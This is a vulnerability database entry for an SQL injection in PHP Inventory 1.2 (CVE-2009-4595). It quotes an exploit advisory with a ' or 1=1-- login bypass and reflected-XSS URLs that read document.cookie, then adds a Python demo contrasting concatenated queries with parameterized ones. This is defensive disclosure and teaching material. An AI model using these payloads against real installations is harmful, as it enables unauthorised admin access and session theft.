PHP Inventory 'index.php' SQL Injection Vulnerability

Vulnerability ID 1118752 Vulnerability type SQL injection
Published 2009-12-10 Updated 2010-01-13
CVE number CVE-2009-4595 CNNVD-ID CNNVD-201001-065
Platform PHP CVSS score 6.0
|Vulnerability source
https://www.exploit-db.com/exploits/10370
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201001-065
|Vulnerability details
A SQL injection vulnerability exists in index.php of PHP Inventory 1.2. A remote authenticated user can execute arbitrary SQL commands via the sup_id parameter in the supplier-information operations.
|Vulnerability EXP
#################################################################
#
# PHP Inventory v1.2 Remote (Auth Bypass) SQL Injection Vulnerability
# Found By: mr_me
# Download: http://www.phpwares.com/content/php-inventory
# Tested On: Windows Vista
# Note: For educational purposes only
#
#################################################################

First of all, let's log in to admin with:

http://[server]/php-inventory/index.php

username: ' or 1=1--
password: ' or 1=1--

The app is riddled with SQL Injection. For example:

http://[server]/php-inventory/index.php?sub=users&action=details&user_id=[SQLI]

SELECT * FROM `site_users` WHERE `user_id`='1003''You have an error in your SQL syntax; 
check the manual that corresponds to your MySQL server version for the right syntax to use near ''1003''' at line 1

This of course means you can do some slightly dodgy reflected XSS:

http://[server]/php-inventory/index.php?sub=suppliers&action=details&sup_id=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://[server]/php-inventory/index.php?sub=suppliers&action=details&sup_id='><script>alert(document.cookie)</script>

I leave the exploiting up to the reader.
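The root cause described above (user-controlled values such as user_id and sup_id concatenated straight into the SQL string, with the database error then echoed back into the page) is shown below in an added example that is not code from PHP Inventory or from the advisory. It uses Python with an in-memory SQLite table whose name and columns (site_users, user_id) are taken from the error message on the page; the rows, usernames and passwords are constructed sample data. The vulnerable lookup reproduces the broken-quote syntax error and the ' or 1=1-- login bypass, the parameterized versions bind the value so it is never parsed as SQL, and a small helper escapes the value before it is reflected into an error page. The equivalent fix in the PHP application itself would be mysqli/PDO prepared statements.

```python
import html
import sqlite3

# Constructed sample data; only the table and column names come from the page.
SAMPLE_USERS = [
    (1003, "admin", "s3cret"),   # plaintext passwords only to keep the demo short
    (1004, "alice", "hunter2"),
]


def make_db() -> sqlite3.Connection:
    """Build an in-memory database with a constructed site_users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE site_users (user_id INTEGER, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO site_users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def user_details_vulnerable(conn, user_id: str):
    """String concatenation: the pattern behind the MySQL error quoted above.

    A stray quote in user_id breaks the statement, and a crafted value can
    change its meaning entirely.
    """
    sql = "SELECT * FROM site_users WHERE user_id='" + user_id + "'"
    return conn.execute(sql).fetchall()


def user_details_safe(conn, user_id: str):
    """Parameterized query: the value is bound, never interpreted as SQL."""
    sql = "SELECT * FROM site_users WHERE user_id=?"
    return conn.execute(sql, (user_id,)).fetchall()


def vulnerable_lookup_raises(conn, user_id: str) -> bool:
    """True if the concatenated query fails to parse for this input."""
    try:
        user_details_vulnerable(conn, user_id)
    except sqlite3.OperationalError:
        return True
    return False


def login_vulnerable(conn, username: str, password: str):
    """Concatenated login check; ' or 1=1-- comments out the password clause."""
    sql = ("SELECT * FROM site_users WHERE username='" + username
           + "' AND password='" + password + "'")
    return conn.execute(sql).fetchone()


def login_safe(conn, username: str, password: str):
    """Bound parameters: the quote and comment sequence are just characters."""
    sql = "SELECT * FROM site_users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone()


def render_error(raw_value: str) -> str:
    """Escape a reflected parameter so a script payload renders as text.

    Reflecting the raw value into the error page is what turned the
    injection above into reflected XSS as well.
    """
    return "<p>No record found for id: " + html.escape(raw_value) + "</p>"


if __name__ == "__main__":
    db = make_db()
    print(user_details_safe(db, "1003"))
    print("vulnerable query breaks on 1003':", vulnerable_lookup_raises(db, "1003'"))
    print("bypass works on vulnerable login:",
          login_vulnerable(db, "' or 1=1--", "' or 1=1--") is not None)
    print("bypass works on safe login:",
          login_safe(db, "' or 1=1--", "' or 1=1--") is not None)
    print(render_error("'><script>alert(document.cookie)</script>"))
```

The same input that produces a syntax error in the concatenated query simply matches no row in the bound version, and the authentication bypass payload becomes a literal username that does not exist; that behavioural difference is the check to run against any lookup in the application that builds SQL from request parameters.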
|References

Source: SECUNIA
Name: 37672
Link: http://secunia.com/advisories/37672